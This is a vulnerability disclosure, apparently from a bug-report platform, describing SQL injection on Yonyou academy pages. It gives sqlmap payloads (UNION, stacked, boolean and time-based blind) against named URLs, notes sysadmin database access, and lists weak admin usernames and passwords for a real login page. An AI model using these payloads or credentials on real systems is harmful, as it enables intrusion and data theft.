用友某服务器sql注入

### 简要描述： 路过. ### 详细说明： http://academy.yonyou.com/Px_plan1.aspx?infoid=109 http://academy.yonyou.com/News_1.aspx?newsid=105 http://academy.yonyou.com/open_Courses.aspx?year=2014 ``` Place: GET Parameter: infoid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: infoid=109' AND 3041=3041 AND 'lGkP'='lGkP Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: infoid=-8922' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+C HAR(105)+CHAR(110)+CHAR(108)+CHAR(113)+CHAR(111)+CHAR(67)+CHAR(114)+CHAR(89)+CHA R(88)+CHAR(75)+CHAR(102)+CHAR(103)+CHAR(99)+CHAR(90)+CHAR(113)+CHAR(98)+CHAR(118 )+CHAR(111)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: infoid=109'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: infoid=109' WAITFOR DELAY '0:0:5'-- --- ``` ### 漏洞证明： [<img src="https://images.seebug.org/upload/201505/24131802277fae5bbe1ff50f5a0e4e8939b38776.jpg" alt="QQ截图20150524131955.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/24131802277fae5bbe1ff50f5a0e4e8939b38776.jpg) [<img src="https://images.seebug.org/upload/201505/2413205298eff31cb9dda0138feae16b7ae31868.jpg" alt="QQ截图20150524132248.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/2413205298eff31cb9dda0138feae16b7ae31868.jpg) sa权限 未深入. http://learning.yonyou.com/index.php?m=admin 弱口令 fbadmin / fbadmin ztadmin / ztadmin [<img src="https://images.seebug.org/upload/201505/241323044f2af951b9816ca7fa3399de6f76f71d.jpg" alt="QQ截图20150524132458.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/241323044f2af951b9816ca7fa3399de6f76f71d.jpg)